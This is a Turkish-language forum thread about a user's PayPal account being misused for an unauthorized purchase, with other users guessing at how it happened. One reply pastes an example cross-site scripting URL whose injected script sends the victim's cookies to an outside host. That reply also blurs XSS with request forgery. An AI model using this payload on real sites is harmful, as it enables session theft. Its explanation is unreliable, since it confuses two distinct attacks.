PayPal

[tomkat]

kullanan ve third party tarafindan accountu izinsiz kullanilan var mi?

hack degil olay

dun mail geldi paypal kullandiginiz icin sagouln, here's your receipt falan diye

ibnenin biri 200 euro'luk mal almis almanya'dan benim hesabi kullanarak

10 saniye sonra paypal bi mail daha atti

we believe that your account has been compromised tarzi bisey dedi

direk complaint ticket'i actim, neyse is cozuldu bugun, para geri verildi

soruyorum telefonda kadina

bak guzel kardesim for the 50th time, how can i trust your organization if you refuse to give me information about how my account had been compromised lan diye

kadin eeeoo would you like to reactivate your account now using 3 simple steps diyo hala

neyse bunlardan bilgi alamiycagim kesin bi aciklari var ve soyleyemiyolar



bilen biri var mi nasil hacklenmisim ben, ne metodla yapmislar bunu? cunku 2 aydir paypal'a girdigim yok, keylogger falan olmasi imkansiz, virus taramasi temiz cikti

ne kaldi geriye?

IT'ci varsa pls yardim

[Silphatos]

paypal hesabını paypal'dan alamazlar orası kesin, yine büyük ihtimal paypal kullandığın bir site (scriptle paypal'ı açıp ödeme yaptıranlar) veya yine trojan/keylogger tarzı bir şeyle kaptırmışsın bence hesap bilgilerini.

[tomkat]

Silphatos said:

paypal hesabını paypal'dan alamazlar orası kesin, yine büyük ihtimal paypal kullandığın bir site (scriptle paypal'ı açıp ödeme yaptıranlar) veya yine trojan/keylogger tarzı bir şeyle kaptırmışsın bence hesap bilgilerini.

al history:

3 ay once verisign verified siteden alis veris yaptim
2 ay once your freedom enhanced package aldim
1 ay once blizz'den mobile authenticator aldim

bu kadar

hep alis veris yaptigim yerler yani

[Friedman]

your freedomdan birinin başı daha yanmıştı burda sanki

[reyou]

paypayle ole bi acik varmi bilmiyorum ama
senin cross site scripting yapmis olabilirler,

bunun disinda paylapde kullandigin email/password
baska dandik forumlarda kullaniyosan ordan biri arak yapmis olabilir.

[tomkat]

abi keylogger olsa 1 ay once olurdu olay

1 aydir birak log in olmayi, paypal.com bile yazmadim

noolduysa dun oldu

[tomkat]

reyou said:

paypayle ole bi acik varmi bilmiyorum ama
senin cross site scripting yapmis olabilirler,

bunun disinda paylapde kullandigin email/password
baska dandik forumlarda kullaniyosan ordan biri arak yapmis olabilir.

cross site olayi nasil oluyor?

[Silphatos]

illa ele geçirdiği an kullanacak diye bir şey yokki abi

[reyou]

tomkat said:

reyou said:

paypayle ole bi acik varmi bilmiyorum ama
senin cross site scripting yapmis olabilirler,

bunun disinda paylapde kullandigin email/password
baska dandik forumlarda kullaniyosan ordan biri arak yapmis olabilir.

cross site olayi nasil oluyor?

internetten buldugum ornegi veriyim

	http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi? '%20+document.cookie</script> 

	

mesela sen bi siteye girdigin zaman o site paypal'e
post gonderiyor, mesela
200 dolar su hesaba gec diye,
eger sen o anda paypal e login olmussan ve cookie lerin yerinde duruyosa senin cookierine de birlikte gonderiyo.

eksisozluge gecenlerde yapilan saldirinin bir benzeri.

bolece sen sanki gonder dugmesine tiklaissin gibi oluyo.

[tomkat]

simdi o zaman ff'u her kapattigimda clear recent history yapicam

saved passwords ile cookie ayni sey diil di mi?

[razzRaziel]

paypal'in açık kalma gibi bir olayı yok ki 10 dk aktif olmadın mı atıyor seni hemen. büyük ihtimal senin hesap bilgileri çoktandır başkalarının elindeydi, aradan zaman geçtikten sonra ya da seninkine sıra geldiğinde harcama yaptılar.